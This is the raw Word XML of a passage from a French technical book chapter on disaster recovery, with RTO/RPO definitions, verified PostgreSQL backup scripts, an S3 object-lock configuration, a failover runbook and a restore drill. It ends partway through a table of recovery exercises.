            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Combien de temps sans service ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2 heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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RPO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Combien de données perdues ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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15 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MTTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3633"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Temps moyen de rétablissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mesuré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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MTBF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Temps moyen entre pannes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Mesuré</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REPRISE APRÈS SINISTRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ensemble des moyens qui permettent de rétablir un service après la perte d'un site, d'une région ou d'un composant majeur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="102" name="Picture 102"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f100.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.100 — Deux architectures de reprise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un cadrage écrit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Ce que le métier doit écrire avant tout choix technique</w:t>
        <w:br/>
        <w:t># Service : prise de commande</w:t>
        <w:br/>
        <w:t># RTO : 2 h      (au-delà, la journée commerciale est perdue)</w:t>
        <w:br/>
        <w:t># RPO : 15 min   (au-delà, les commandes doivent être ressaisies)</w:t>
        <w:br/>
        <w:t># Fenêtre de bascule autorisée : dimanche 02:00-05:00</w:t>
        <w:br/>
        <w:t># Décideur de bascule : astreinte + responsable produit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>87.2 Sauvegardes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une sauvegarde non testée n'est pas une sauvegarde : c'est une intention. Trois propriétés comptent : la copie existe, elle est restaurable, et la restauration a été mesurée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.340 — Quatre protections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47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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Protège de</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Ne protège pas de</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Instantané de volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur disque</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Suppression logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>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Sauvegarde logique (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pg_dump</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Erreur de données</w:t>
            </w:r>
          </w:p>
        </w:tc>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Perte de site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Journal en continu (WAL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Perte des dernières minutes</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Corruption logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>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Réplique hors site</w:t>
            </w:r>
          </w:p>
        </w:tc>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Perte de région</w:t>
            </w:r>
          </w:p>
        </w:tc>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Suppression propagée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une sauvegarde vérifiée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Sauvegarde logique quotidienne, conservée hors du cluster</w:t>
        <w:br/>
        <w:t>pg_dump --format=custom --no-owner --file=/sauvegardes/app-$(date +%F).dump \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "$DATABASE_URL"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification immédiate : la sauvegarde se restaure-t-elle ?</w:t>
        <w:br/>
        <w:t>createdb verif_$(date +%F)</w:t>
        <w:br/>
        <w:t>pg_restore --dbname=verif_$(date +%F) --no-owner /sauvegardes/app-$(date</w:t>
        <w:br/>
        <w:t xml:space="preserve">  +%F).dump</w:t>
        <w:br/>
        <w:t>psql -d verif_$(date +%F) -c "SELECT count(*) FROM commandes;"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Rétention : 7 quotidiennes, 4 hebdomadaires, 12 mensuelles</w:t>
        <w:br/>
        <w:t>aws s3 ls s3://sauvegardes/app/ | tail</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UNE RÉPLICATION N'EST PAS UNE SAUVEGARDE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une suppression exécutée sur la base primaire est répliquée en quelques millisecondes sur le réplica. Sans copie immuable ou différée, la donnée disparaît partout en même temps.</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COPIE IMMUABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Sauvegarde protégée en écriture pour une durée déterminée (verrou de conformité). Elle ne peut être supprimée, même par un compte administrateur, avant l'échéance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une copie immuable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Verrou d'objet S3 : protège contre la suppression et le chiffrement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  malveillant</w:t>
        <w:br/>
        <w:t>aws s3api put-object-lock-configuration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --bucket sauvegardes-app \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --object-lock-configuration '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ObjectLockEnabled": "Enabled",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 35}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>87.3 Reprise progressive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On ne bascule pas un système entier d'un coup : on rétablit par ordre de dépendance, en commençant par ce qui ne dépend de rien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="103" name="Picture 103"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f101.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.101 — Ordre de rétablissement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un runbook de bascule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Plan de bascule résumé (extrait d'un runbook)</w:t>
        <w:br/>
        <w:t>## Phase 1 — Isolements (10 min)</w:t>
        <w:br/>
        <w:t>1. Mettre le service en maintenance (page statique servie par le CDN)</w:t>
        <w:br/>
        <w:t>2. Bloquer les écritures applicatives</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Phase 2 — Données (45 min)</w:t>
        <w:br/>
        <w:t>3. Restaurer la dernière sauvegarde vérifiée dans la région secondaire</w:t>
        <w:br/>
        <w:t>4. Rejouer les journaux jusqu'à l'instant de bascule</w:t>
        <w:br/>
        <w:t>5. Contrôler les compteurs métier (commandes du jour, total encaissé)</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Phase 3 — Services (30 min)</w:t>
        <w:br/>
        <w:t>6. Déployer depuis le dépôt Git sur le cluster secondaire</w:t>
        <w:br/>
        <w:t>7. Vérifier readiness, migrations, files</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Phase 4 — Trafic (10 min)</w:t>
        <w:br/>
        <w:t>8. Basculer le DNS avec un TTL court</w:t>
        <w:br/>
        <w:t>9. Surveiller erreurs et latence pendant 30 min</w:t>
        <w:br/>
        <w:t>10. Consigner l'heure de bascule et les écarts constatés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.341 — Quatre étapes chiffrées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0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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Durée cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Point de contrôle</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Restauration</w:t>
            </w:r>
          </w:p>
        </w:tc>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45 min</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Compteurs cohérents</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pods prêts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Bascule DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>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10 min</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Erreurs &lt; 1 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>87.4 Tester sans provoquer l'incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un plan non testé contient toujours une erreur : un secret oublié, un domaine non délégué, une version d'image absente du registre secondaire. Les exercices de reprise révèlent ces trous avant qu'ils ne coûtent cher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un exercice mesuré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Exercice de restauration, sans impact sur la production</w:t>
        <w:br/>
        <w:t># 1. Créer un environnement isolé</w:t>
        <w:br/>
        <w:t>terraform workspace new test-reprise</w:t>
        <w:br/>
        <w:t>terraform apply -var="region=eu-west-1"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Restaurer la sauvegarde de la veille</w:t>
        <w:br/>
        <w:t>pg_restore --dbname="$DSN_TEST" /sauvegardes/app-2026-10-18.dump</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. Déployer la version courante et vérifier</w:t>
        <w:br/>
        <w:t>kubectl --context secondaire rollout status deployment/api</w:t>
        <w:br/>
        <w:br/>
        <w:t># 4. Mesurer et consigner</w:t>
        <w:br/>
        <w:t>echo "RTO mesuré : $(date -d @$(( $(date +%s) - DEBUT )) +%M min)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.342 — Quatre exercices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9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Exercice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Ce qu'il révèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Restauration de base</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Mensuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
